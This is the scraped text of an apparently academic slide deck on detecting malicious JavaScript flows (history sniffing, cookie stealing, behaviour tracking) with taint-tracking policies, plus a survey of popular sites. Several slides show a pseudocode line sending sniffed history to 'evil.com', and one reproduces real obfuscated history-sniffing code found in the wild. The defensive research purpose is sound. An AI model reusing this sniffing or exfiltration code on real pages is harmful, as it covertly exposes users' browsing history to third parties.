Download presentation
Presentation is loading. Please wait.
3
document.location ✗ Location Hijacking Phishing
5
document.cookie Identity Theft ✗ Cookie Stealing
7
✗ History Sniffing JavaScript Visited Not-Visited
9
See absolutely everything visitors do on your webpage. …
10
Behavior Tracking ✗
11
Plenty of Mischief Possible!
12
How Prevalent Are Malicious Flows? How to Detect Malicious Flows?
13
Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions
14
Flow Policies Specify different types of flows
15
Policies:History Sniffing 1. Create (invisible) link to a.com color depends on history 2. Inspect link’s color style property color says if link was visited 3. Send sniffed info over network
16
Policies:History Sniffing link = createLink(“facebook.com”); style = doc.getStyle(link); visited = style.color==“purple”; send(“evil.com”,“facebook=” + visited);
17
Policies:History Sniffing Inject Taints (At confidential sources) link = createLink(“facebook.com”); style = doc.getStyle(link); visited = style.color==“purple”; send(“evil.com”,“facebook=” + visited); doc.getStyle(link);
18
Policies:History Sniffing Propagate Taints (At assignments, etc.) link = createLink(“facebook.com”); style = doc.getStyle(link); visited = style.color==“purple”; send(“evil.com”,“facebook=” + visited); doc.getStyle(link); send(“evil.com”,“facebook=” + visited); style visited style.color==“purple” style.color==“purple”;
19
link = createLink(“facebook.com”); style = doc.getStyle(link); visited = style.color==“purple”; send(“evil.com”,“facebook=” + visited); “cr=” + color Policies:History Sniffing Block Taints (At untrusted sinks) send(“evil.com”,“facebook=” + visited);
20
Flow Policies Inject Block
21
Flow Policies at doc.getStyle($1) if isLink($1) inject “secret” Taint style with “secret” Inject Block
22
Flow Policies Inject Block
23
Flow Policies at send($1, $2) block “secret” on $2 Block tainted values to third-party Inject Block
24
Flow Policies Inject Block at Site if Cond inject Taint at Site block Taint on Param
25
Flow Policies Expressive History Sniffing Behavior Tracking Cookie Stealing Location Hijacking…
26
Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions
27
Dynamic Flow Tracking Rewrite JS code to carry taints ParseExecute Source code AST Rewrite AST Dynamic Eval [Chander et al POPL 07]
![Dynamic Flow Tracking Rewrite JS code to carry taints ParseExecute Source code AST Rewrite AST Dynamic Eval [Chander et al POPL 07]](http://images.slideplayer.com./25/7604378/slides/slide_27.jpg "Dynamic Flow Tracking Rewrite JS code to carry taints ParseExecute Source code AST Rewrite AST Dynamic Eval [Chander et al POPL 07]")
28
Add.taint fields ParseExecute Source code AST Rewrite AST Dynamic Eval Inject, Propagate, Block Taints Rewritten Code
29
Rewriting Issues ParseExecute Source code AST Rewrite AST Boxing / Unboxing Indirect Flows Dynamic Eval
30
Rewriting Issues ParseExecute Source code AST Rewrite AST Boxing / Unboxing Indirect Flows Dynamic Eval
31
Dynamic Flow Tracking Rewrite JS code to carry taints ParseExecute Source code AST Rewrite AST Dynamic Eval Implemented in Chrome/V8
32
Dynamic Flow Tracking Performance (Overhead)
33
Performance: Policies Cookie Confidentiality cookie doesn’t flow to 3 rd party code Location Integrity location unaffected by 3 rd party code
34
Performance: Benchmark 10 sites with the largest JS code base in Alexa top 100 15 – 31 Kloc (avg. 21Kloc)
35
Performance: Figures Timing Overheads Page load (avg: 2x) JS execution (avg: 3x)
36
Performance: Upshot High for online use Acceptable for offline survey
37
Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions
38
Flows “In the Wild” History Sniffing Behavior Tracking
39
History Sniffing: Figures Alexa Top 50,000 sites 63 sites reported as sending history over network 1 site in Alexa Top 100 46 sites were real cases
40
var k = {0:"qpsoivc/dpn",1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn“...}; var g = []; for (var m in k) { var d = k[m]; var a = ""; for (f=0; f<d.length; f++) a+=String.fromCharCode(d.charCodeAt(f) - 1) var h = false; for (var j in { "http://":"", "http://www.":""}) { var l = document.createElement("a"); l.href = j + a; document.getElementById("ol").appendChild(l); var e = document.getComputedStyle(l).getPropertyValue("color") if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true } } if (h) { g.push(m) } } Encrypted URLs Decrypt URL Create Link Inspect Color History Sniffing: Example 1 site in Alexa Top 100
![var k = {0: qpsoivc/dpn ,1: sfeuvcf/dpn , 2: bevmugsjfoegfs/dpn ...}; var g = []; for (var m in k) { var d = k[m]; var a = ; for (f=0; f<d.length; f++) a+=String.fromCharCode(d.charCodeAt(f) - 1) var h = false; for (var j in { : , : }) { var l = document.createElement( a ); l.href = j + a; document.getElementById( ol ).appendChild(l); var e = document.getComputedStyle(l).getPropertyValue( color ) if (e == rgb(12, 34, 56) || e == rgb(12,34,56) ) { h = true } } if (h) { g.push(m) } } Encrypted URLs Decrypt URL Create Link Inspect Color History Sniffing: Example 1 site in Alexa Top 100](http://images.slideplayer.com./25/7604378/slides/slide_40.jpg "var k = {0: qpsoivc/dpn ,1: sfeuvcf/dpn , 2: bevmugsjfoegfs/dpn ...}; var g = []; for (var m in k) { var d = k[m]; var a = ; for (f=0; f<d.length; f++) a+=String.fromCharCode(d.charCodeAt(f) - 1) var h = false; for (var j in { : , : }) { var l = document.createElement( a ); l.href = j + a; document.getElementById( ol ).appendChild(l); var e = document.getComputedStyle(l).getPropertyValue( color ) if (e == rgb(12, 34, 56) || e == rgb(12,34,56) ) { h = true } } if (h) { g.push(m) } } Encrypted URLs Decrypt URL Create Link Inspect Color History Sniffing: Example 1 site in Alexa Top 100")
41
History Sniffing: Real Cases RankSiteDescSrcInspected URLs 61youpornadultyoupornpornhub,tube8,+ 21 867charter.netnewsinterclickcars,edmunds,+46 2333feedjittrafficfeedjittwitter,facebook,+6 2415gamestorrentsgamemeaningtoolamazon,ebay,+220 2811newsmaxnewsinterclickcars,edmunds,+46 3508nameprosforumfeedjittwitter,facebook,+6 3603fulltonomusicmeaningtoolamazon,ebay,+220 4266youporngayadultyouporngaypornhub,tube8,+ 21 4581osdirtechinterclickcars,edmunds,+46 5233gamesfreakgameinterclickcars,edmunds,+46 + 36 more cases…
42
History Sniffing: Real Cases
44
doubleclick.net charter.net doubleclick.net interclick
45
History Sniffing: Real Cases gamestorrents harrenmedianetwork meaningtool
46
History Sniffing: Upshot # of sniffed URLs: 8 to 222 46 of real cases 39 had third-party sniffing code 7 had home-grown code Obfuscated sniffing code Code was generated at runtime
47
Malicious Flows “In the Wild” History Hijacking Behavior Tracking
48
Log user behavior by JS event handlers Send log back to website
49
Behavior Tracking: Policy while(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e);... } onMouseOver = function(event) isMouseOver = true; } true
50
Behavior Tracking: Policy at $1.isMouseOver() inject “secret” at $1.isClick() inject “secret” … while(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e);... } e.isMouseOver()
51
Behavior Tracking: Figures Alexa Top 1300 sites 328 sites sent behavior 115 sites sent behavior covertly 10 sampled for manual inspection 7 manually reconstructed flow Automatically trigger JS event handlers Many user-visible (image swapping) Covert Filter: response < 100 bytes
52
Behavior Tracking: Real Cases
54
webtrends.com
55
Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions
56
Flows Occur In The Wild Real cases for further study Dynamic Approach is Required Obfuscated & dynamically generated
57
Future work Larger Scale Study on Flows Deeper crawl & other types of flow Bullet-proof Protection Tool Policy enforcement without much slowdown & many false-alarms
58
Thank you!
Similar presentations
